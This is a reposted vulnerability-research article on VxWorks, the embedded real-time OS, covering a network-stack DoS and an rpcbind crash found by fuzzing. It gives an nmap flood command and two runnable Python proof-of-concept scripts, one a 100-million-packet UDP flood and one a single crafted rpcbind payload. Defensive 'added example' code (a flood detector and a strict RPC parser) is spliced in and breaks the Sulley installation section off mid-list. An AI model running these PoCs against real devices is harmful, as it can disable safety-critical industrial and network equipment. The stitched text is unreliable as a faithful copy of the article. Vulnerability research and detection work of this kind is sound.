VxWorks Fuzzing: Vulnerability Mining and Debugging Tips for the VxWorks Industrial Real-Time Operating System

ID MYHACK58:62201671058
Type myhack58
Reporter Anonymous
Modified 2016-01-16T00:00:00


VxWorks is the most widely deployed real-time operating system (RTOS) in embedded systems worldwide. It was designed and developed in 1983 by the US company Wind River Systems (WRS). Its market spans all safety-critical areas, including, to name a few, the Mars Curiosity rover, the Boeing 787 Dreamliner and network routers. The high-risk nature of these applications makes the security of VxWorks a matter of great concern. VxWorks is claimed to run on at least 1.5 billion devices and supports almost all modern embedded CPU architectures on the market, including the x86 family, MIPS, PowerPC, Freescale ColdFire, Intel i960, SPARC, SH-4, ARM, StrongARM and xScale.

At the 44CON London summit held on 9-11 September 2015, Yannick Formaggio presented his in-depth security research on VxWorks. He used the Sulley fuzzing framework to fuzz several VxWorks protocols, found a number of vulnerabilities, and built a remote debugger on top of the VxWorks WDB RPC protocol for the related debugging and analysis. Many of his results and vulnerability details were not disclosed. We set up x86 virtual environments for VxWorks 5.5 and VxWorks 6.6 and, following Formaggio's method, carried out a preliminary security study of VxWorks; this article describes the details and results of that study. The contents are:

1. Vulnerability overview
2. Installing the Sulley fuzzing framework and fuzzing the relevant protocols
3. VxWorks WDB RPC V2 analysis
4. VxWorks WDB RPC V2 services exposed on the Internet
This article does not cover all of the study details and methods, so the following related material is given for supplementary reference:

* Building a VxWorks 5.5 & 6.6 simulation environment
* Running VxWorks (5.5) under VMware
* Gray Hat Python, Chapter 9 (Sulley)
* Sulley official documentation: sulley/docs/index.html in the project's git repository

0x01 Vulnerability overview

We reproduced the security issues noted by Formaggio and found no new issues. The vulnerability details are as follows.

Network stack issue

Vulnerability description: when certain 5.x versions of VxWorks receive a large number of network packets in a short period of time, the network stack crashes and VxWorks can no longer communicate with external hosts. In some cases the terminal prints an error message (screenshot omitted). Note that in some cases the vulnerability is triggered and the DoS succeeds without the VxWorks terminal printing the

panic: netJobAdd: ring buffer overflow!

message; the network stack has nonetheless crashed and can no longer communicate with the outside world, which can be verified by pinging the host continuously. The error message above is generally printed only when the number of packets received is very large.

Affected versions: some 5.x versions

Verification methods:

1. Nmap (the command may need to be run several times): sudo nmap -sU -p110-166 -r -T5 -n 192.168.1.111, where 192.168.1.111 is the IP address of the host running VxWorks 5.5. After receiving the scan packets, the VxWorks host prints no error message, but its network stack has crashed and it can no longer communicate with the outside world.
2. Continuously send a very large number of FTP request packets to the FTP service on tcp/21.
3. The following Python code can also be used to verify the problem:

import socket

# Raw SUN-RPC call datagram that is replayed at the target (payload as given on the page).
UDP_PAYLOAD = b'\x72\xfe\x1d\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x01\x97\x7c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

def poc1(host, rpcPort=111, pktNum=6859):
    # Send pktNum copies of the payload to the rpcbind port (udp/111) as fast as possible.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for i in range(pktNum):
        sock.sendto(UDP_PAYLOAD, (host, rpcPort))

def poc2(host, rpcPort=111, portNum=26):
    # Send one copy of the payload to each UDP port from rpcPort to rpcPort + portNum.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for port in range(rpcPort, rpcPort + portNum + 1):
        sock.sendto(UDP_PAYLOAD, (host, port))

if __name__ == '__main__':
    import sys
    poc1(host=sys.argv[1], rpcPort=111, pktNum=100000000)
    poc2(host=sys.argv[1], rpcPort=111, portNum=27)
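Detection for the flood described above, added here as an example that is not part of the original article: a sliding-window counter over flow records that flags any source sending more than a threshold of UDP packets into the port range the article's nmap command sweeps (110-166) within one second. The flow records are constructed for the example; the client addresses 10.0.0.5 and 10.0.0.9 are invented, 192.168.1.111 is the article's VxWorks host, and the one-second window and 500-packet threshold are assumptions to be tuned for the monitored network.

```python
"""Rate-based detector for a UDP burst against the SUN-RPC port range (added example)."""
from collections import defaultdict, deque

# udp/111 plus the range swept by the article's nmap command; an assumption for this example.
WATCHED_PORTS = frozenset(range(110, 167))


def make_sample_records():
    """Constructed flow records: (timestamp_s, src_ip, dst_ip, dst_port, proto).

    10.0.0.5 is a benign client issuing one portmapper query every 0.2 s;
    10.0.0.9 sends 1500 datagrams in one second, sweeping ports 110..166.
    """
    records = []
    for i in range(50):
        records.append((0.2 * i, "10.0.0.5", "192.168.1.111", 111, "udp"))
    for i in range(1500):
        port = 110 + (i % 57)
        records.append((3.0 + i / 1500.0, "10.0.0.9", "192.168.1.111", port, "udp"))
    # Unrelated TCP traffic from the noisy host; must not count towards the alert.
    records.append((4.0, "10.0.0.9", "192.168.1.111", 80, "tcp"))
    return sorted(records)


def detect_udp_bursts(records, window=1.0, threshold=500, ports=WATCHED_PORTS):
    """Count UDP packets per (src, dst) inside a sliding time window.

    Returns {(src, dst): (alert_timestamp, packets_in_window)} for every pair
    whose count first exceeds `threshold` within `window` seconds.
    """
    windows = defaultdict(deque)   # (src, dst) -> timestamps currently inside the window
    alerts = {}
    for ts, src, dst, dport, proto in sorted(records):
        if proto != "udp" or dport not in ports:
            continue
        key = (src, dst)
        q = windows[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and key not in alerts:
            alerts[key] = (ts, len(q))
    return alerts


if __name__ == "__main__":
    for (src, dst), (ts, count) in detect_udp_bursts(make_sample_records()).items():
        print("ALERT t=%.3fs %s -> %s: %d UDP packets to rpc ports within 1 s" % (ts, src, dst, count))
```

The detector deliberately keys on destination port range rather than payload, because the article notes the crash also follows a plain UDP port sweep and an FTP request flood: volume, not a signature, is the indicator. On a real network the same loop would consume flow export (NetFlow/IPFIX) or firewall logs instead of the constructed list.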

rpcbind service issue

Vulnerability description: the rpcbind service is part of the SUN-RPC implementation in VxWorks and listens on tcp/111 and udp/111. An attacker who sends a specially crafted packet to that port can crash the rpcbind service, and a carefully constructed request may lead to arbitrary code execution. The terminal prints an error message (screenshot omitted).

Affected versions: 5.x & 6.x

Verification: the following Python code can be used to verify the vulnerability:

import socket

# Malformed SUN-RPC call datagram, as hex (payload as given on the page).
PAYLOAD_HEX = 'cc6ff7e200000000000000020001a086000000040000000488888888000000110000001100001111111111111111111111111111'

def poc(host, rpcPort=111):
    # Send the single crafted datagram to the rpcbind port.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(bytes.fromhex(PAYLOAD_HEX), (host, rpcPort))

if __name__ == '__main__':
    import sys
    poc(sys.argv[1])

0x02 Sulley installation & protocol fuzzing

Formaggio used Sulley to fuzz VxWorks; we followed his approach and tried to implement fuzzing based on Sulley.

Installing Sulley

The official Sulley documentation gives a detailed installation guide, "Sulley – Windows Installation", and FreeBuf has published a translation of it:

* Using fuzz technology in penetration testing (with Windows installation guide)

Below is a brief description of our installation process; the environment is Win7 x86:

1. MinGW
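The rpcbind crash above is the kind of failure a strict SUN-RPC header parser prevents, so here is one as an added example (not code from the article or from Wind River): it validates every field of an RPC call header per RFC 5531 before touching any length-driven copy, refusing non-CALL messages, RPC versions other than 2, unknown credential flavors, opaque_auth bodies over the 400-byte limit, and lengths that run past the datagram. The test vectors are constructed inline; one of them carries the credential flavor 0x88888888 that is visible in the article's rpcbind payload, the others are invented malformations of a well-formed PMAPPROC_GETPORT call.

```python
"""Strict SUN-RPC (RFC 5531) call-header validation (added example)."""
import struct

RPC_CALL = 0            # msg_type of a call message
RPC_VERSION = 2         # the RPC protocol version in use
MAX_AUTH_BYTES = 400    # RFC 5531 upper bound on an opaque_auth body
PMAP_PROG = 100000      # portmapper / rpcbind program number
PMAPPROC_GETPORT = 3
IPPROTO_UDP = 17
# Auth flavors a conservative rpcbind would recognise; anything else is refused.
KNOWN_AUTH_FLAVORS = {0: "AUTH_NONE", 1: "AUTH_SYS", 2: "AUTH_SHORT", 3: "AUTH_DES", 6: "RPCSEC_GSS"}


class RpcParseError(ValueError):
    """Raised for any message a strict parser should refuse."""


def _u32(buf, off):
    """Read one big-endian XDR unsigned int, never reading past the end of buf."""
    if off + 4 > len(buf):
        raise RpcParseError("truncated at offset %d" % off)
    return struct.unpack_from("!I", buf, off)[0], off + 4


def _opaque_auth(buf, off, name):
    """Parse opaque_auth {flavor, length, body}; the length is checked before it is used."""
    flavor, off = _u32(buf, off)
    length, off = _u32(buf, off)
    if flavor not in KNOWN_AUTH_FLAVORS:
        raise RpcParseError("%s: unknown auth flavor 0x%08x" % (name, flavor))
    if length > MAX_AUTH_BYTES:
        raise RpcParseError("%s: auth body %d exceeds %d bytes" % (name, length, MAX_AUTH_BYTES))
    padded = (length + 3) & ~3          # XDR opaque data is padded to a 4-byte boundary
    if off + padded > len(buf):
        raise RpcParseError("%s: auth body declares %d bytes but only %d remain"
                            % (name, length, len(buf) - off))
    return {"flavor": KNOWN_AUTH_FLAVORS[flavor], "body": buf[off:off + length]}, off + padded


def parse_rpc_call(buf):
    """Parse and validate an RPC call header; returns a dict or raises RpcParseError."""
    xid, off = _u32(buf, 0)
    msg_type, off = _u32(buf, off)
    if msg_type != RPC_CALL:
        raise RpcParseError("not a CALL message (msg_type %d)" % msg_type)
    rpcvers, off = _u32(buf, off)
    if rpcvers != RPC_VERSION:
        raise RpcParseError("unsupported RPC version %d" % rpcvers)
    prog, off = _u32(buf, off)
    vers, off = _u32(buf, off)
    proc, off = _u32(buf, off)
    cred, off = _opaque_auth(buf, off, "cred")
    verf, off = _opaque_auth(buf, off, "verf")
    return {"xid": xid, "prog": prog, "vers": vers, "proc": proc,
            "cred": cred, "verf": verf, "args": buf[off:]}


def check_rpc_call(buf):
    """Non-raising wrapper: (True, parsed_header) or (False, reason)."""
    try:
        return True, parse_rpc_call(buf)
    except RpcParseError as exc:
        return False, str(exc)


def build_call(xid, prog, vers, proc, cred_flavor=0, cred_body=b"", cred_len=None, args=b""):
    """Build a call message with an AUTH_NONE verifier. cred_len overrides the
    declared credential length so malformed test vectors can be constructed."""
    def opaque(flavor, body, declared=None):
        n = len(body) if declared is None else declared
        return struct.pack("!II", flavor, n) + body + b"\x00" * ((-len(body)) % 4)
    header = struct.pack("!IIIIII", xid, RPC_CALL, RPC_VERSION, prog, vers, proc)
    return header + opaque(cred_flavor, cred_body, cred_len) + opaque(0, b"") + args


# Constructed test vectors (not traffic from the article).
# Well-formed GETPORT asking where the portmapper itself listens over UDP.
GOOD_CALL = build_call(0x1234, PMAP_PROG, 2, PMAPPROC_GETPORT,
                       args=struct.pack("!IIII", PMAP_PROG, 2, IPPROTO_UDP, 0))
# Same call with the unknown credential flavor seen in the article's rpcbind packet.
BAD_FLAVOR = build_call(0x1234, PMAP_PROG, 2, PMAPPROC_GETPORT, cred_flavor=0x88888888)
# Credential length far above the RFC limit.
OVERSIZED_CRED = build_call(0x1234, PMAP_PROG, 2, PMAPPROC_GETPORT,
                            cred_flavor=1, cred_body=b"A" * 8, cred_len=5000)
# Credential declaring 17 bytes while only 8 follow and no verifier is present.
SHORT_CRED = (struct.pack("!IIIIII", 0x1234, RPC_CALL, RPC_VERSION, PMAP_PROG, 2, PMAPPROC_GETPORT)
              + struct.pack("!II", 1, 17) + b"\x11" * 8)

if __name__ == "__main__":
    for name, pkt in [("good", GOOD_CALL), ("bad flavor", BAD_FLAVOR),
                      ("oversized cred", OVERSIZED_CRED), ("short cred", SHORT_CRED),
                      ("truncated", GOOD_CALL[:30])]:
        ok, result = check_rpc_call(pkt)
        print("%-15s %s" % (name, "OK prog=%d proc=%d" % (result["prog"], result["proc"])
                            if ok else "REJECT: " + result))
```

Every length read from the wire is compared against both the protocol limit and the bytes actually present before it drives a slice or copy; a parser that copies `length` bytes of credential into a fixed buffer without these two checks is exactly the shape of bug that turns a crafted datagram into the crash, or the code execution, the article describes.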
